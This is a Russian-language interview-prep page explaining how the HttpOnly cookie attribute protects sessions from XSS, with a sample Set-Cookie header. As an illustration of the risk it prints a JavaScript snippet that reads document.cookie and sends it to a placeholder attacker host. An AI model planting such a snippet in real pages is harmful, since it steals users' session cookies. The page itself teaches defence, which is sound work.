Встречается на собеседованиях • сегодня

Зачем нам атрибут HttpOnly в Cookie

Атрибут HttpOnly в Cookie защищает куки от доступа через JavaScript, предотвращая кражу сессий через XSS-атаки. Без него злоумышленник может получить доступ к кукам через document.cookie.

Пример уязвимости:

javascript
// Злоумышленник может выполнить этот код через XSS
const stolenCookie = document.cookie;
fetch('https://attacker.com/steal', { method: 'POST', body: stolenCookie });

С HttpOnly куки передаются только в HTTP-запросах и не доступны через JS. Устанавливается на сервере:

http
Set-Cookie: sessionId=abc123; HttpOnly; Secure; SameSite=Strict

Важно использовать HttpOnly вместе с Secure (только HTTPS) и SameSite для максимальной защиты.

Sophi
Софи собрала все вопросы. Тренируйся и получай
офферы быстрее!
Попробовать бесплатноArrow

Следующий вопрос

Это единственный вопрос по вашему фильтру

как отвечать на вопрос
пример собеседования
фреймворки на собеседовании
типичные вопросы junior
интервью вопросы и ответы